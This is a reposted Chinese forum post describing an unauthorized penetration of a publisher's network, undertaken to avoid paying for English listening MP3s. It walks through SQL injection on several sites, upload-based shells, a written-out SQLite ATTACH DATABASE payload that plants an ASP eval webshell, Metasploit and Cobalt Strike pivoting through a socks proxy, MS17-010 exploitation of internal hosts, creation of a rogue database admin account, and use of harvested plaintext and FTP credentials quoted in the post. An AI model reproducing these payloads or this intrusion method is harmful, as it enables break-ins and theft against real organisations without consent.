anonymou5

 找回密码
 立即注册
搜索
查看: 117|回复: 0

【转载】由一次下载英语听力引起的内网渗透

[复制链接]
匿名
匿名  发表于 2019-2-14 18:51:26 |阅读模式
起因

学校下学期英语考试, 老师让我们自主买这个所谓的英语课外读物, 无奈自己没钱只好下载mp3听听。

1.png

本以为下载下来就完事了, 然后

2.png

cnm, 大概就是你要买书, 书上会有验证码, 然后你才能下载, 否则只能在线购买
注册了一个账号...
价格:

3.png

开搞

信息收集&分析

目标网站: audio.baidu.com

由于我们是要去拿到mp3文件, 文件很可能就在这台服务器上, 所以暂时先不考虑c段和子域名

旁站查询

4.png

目标ip: 202.xxx.xxx.34, 测试后无cdn waf

开放端口

5.png

6.png

7.png

暂时先不从401认证和ftp入手, 截图的几个网站没有扫到任何有意思的目录.
然后网站还有一个 sso https://sso.baidu.com/cas/login 旁站没有查到

其次是每个旁站的web容器不同
ip背后可能是一个内网

8.png

iis7 apache 和 iis6, 加上端口信息中的openssh, 估计内网中可能存在 windows server 2008系列 windows server 2003 和 linux 主机
除此以外, iis6的网站还有短文件名漏洞 (实战尚未用到)

9.png

audio网站可能与旁站中web容器是iis7的网站在同一台服务器, 也有可能是单独的一台服务器在内网.
思路是先随便搞下一个网站然后内网渗透, 或者试试iis7的网站碰碰运气.

开始检测

首先需要一个sso账号

10.png

由于是要拿数据, 我就简单粗暴地找一些高危漏洞诸如sqli 上传这些

hee.baidu.com joomla 1.4.3, 无漏洞
nfltc.baidu.com 织梦 版本 2009, 有一个 search.php 注入漏洞, root权限

11.png

后台找不到, 最新的漏洞也没有效果, 而且织梦的安全机制导致你不能进行文件读写, 水平有限.

12.png

cepc.baidu.com

13.png

检索网站, 右上角升级里面有一处sqli

14.png

抓包

15.png

注入

16.png

17.png

当前用户 baidures db_owner 可以尝试用差异/log备份getshell
物理路径

18.png

D:\webserver\CNClassicCorpus

备份试了好几次都不成功, 有可能是站库分离? 网站也找不到后台

www.baidu.cc aspx iis6

后台 http://www.baidu.cc/Admin/

20.png

太快了没截到, 访问的时候他是先跳到管理主页然后再跳到登录界面的, 觉得这里可能存在js跳转

21.png

22.png

burp替换
后台友情链接有处上传可以直接getshell

23.png

24.png

内网

25.png

web.config

26.png

链接数据库

第一反应就是右边的 MP3DB
不过 baidu 用户权限太小

27.png

另外注意这个数据库列表与之前sqli所列的数据库列表完全不同, 那就说明内网中可能存在多个sqlserver服务器.

其他网站

28.png

并不是全部
本来想提权然后搞内网的, 当时时间也不怎么多就懒得搞了, 倒是想在web上多花点时间看看有没有什么新突破

http://duoyu.baidu.com/ iis7
后台 http://duoyu.baidu.com/admin
注入 http://duoyu.baidu.com/video.aspx?id=6

29.png

sqlite 数据库, 正常的思路就是注入-后台-getshell, 不过这里sqlmap死活爆不出列名, 超级sql注入工具更是连表都跑不出来

30.png

但这是 sqlite 数据库, 图中sqlmap也显示支持堆查询
getshell:
  1. ;ATTACH DATABASE '路径' AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES ('内容'); --
复制代码
那么物理路径怎么找呢? video.aspx 的这个注入在条件为假的时候直接跳转到主页.
这里要用到后台的一个 sqli

31.png

32.png

抓包改成单引号

33.png

右键放到浏览器里

34.png

  1. https://duoyu.baidu.com/video.aspx?id=6;ATTACH DATABASE 'D:\\dyz\\isdyz\\xz.asp' AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES ('<%Eval(Request(chr(35)))%>'); --
复制代码
getshell

35.png

连续搞了两个shell不过发现并没有什么卵用, audio网站"碰巧"都不在里面

36.png

不过这个shell的 network service 目录权限大的一批

37.png

下载下来弄了一会

浏览器无密码, 无rdp记录, 桌面无敏感信息.

内网初探

找朋友借了一台服务器装上msf cs 开搞内网
弄到meterpreter, 传到cs里然后开启socks代理
  1. setg Proxies socks4:117.xxx.xxx.xxx:5345
复制代码
先扫一遍ms17-010

38.png

就这几台有漏洞

192.168.100.2 192.168.100.3 192.168.100.9 192.168.100.23 成功
一个08r2打蓝屏了, 还有剩下的几台03显示 File Not Found 估计是杀软把文件杀掉了

39.png

net view

40.png

192.168.100.2 BAIDU-SQL 之前的那台数据库服务器, 登上去加了一个sa权限的账号

MP3DB

41.png

Tbl_card 估计是验证码之类的东西?

42.png

最新数据是2009年, audio网站的数据库信息不是存储在这台服务器上的, 日偏了。

转折

晚上重新登录cs看的时候发现了一处很有意思的地方
之前导出的明文密码

43.png

当初以为这也是一台win,用psexec登录失败之后就没管
不过注意前面的BAIDUNAS1, NAS功能上相当于大容量网盘 (可能是用这台NAS备份网站数据?)

对着192.168.100.203扫了下端口

44.png

80端口访问失败, 8080通过portfwd转发出来

45.png

账号密码就是之前导出的数据 admin baidu816
File Station 翻到backup文件夹

46.png

baiduaudio

47.png

Upload 里面没多少内容, 下面有个翻页键, 最后一页有web.config

48.png

49.png

数据库连接信息显示的是192.168.100.2这台主机, baiduaudio数据库之前在翻的时候也没有看到

注意下面的 ftpServer 202.xxx.xxx.34:8021 ftpUser audiodl ftpPsw enjoy8
ip就是目标网站的ip, 8021端口的信息在nmap的扫描报告里面

50.png

连接

51.png

很开心的找到了文件

52.png

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

( 蜀ICP备18025895号 )

GMT+8, 2019-3-21 14:14 , Processed in 0.124360 second(s), 23 queries .

Powered by anonymou5 0.1

快速回复 返回顶部 返回列表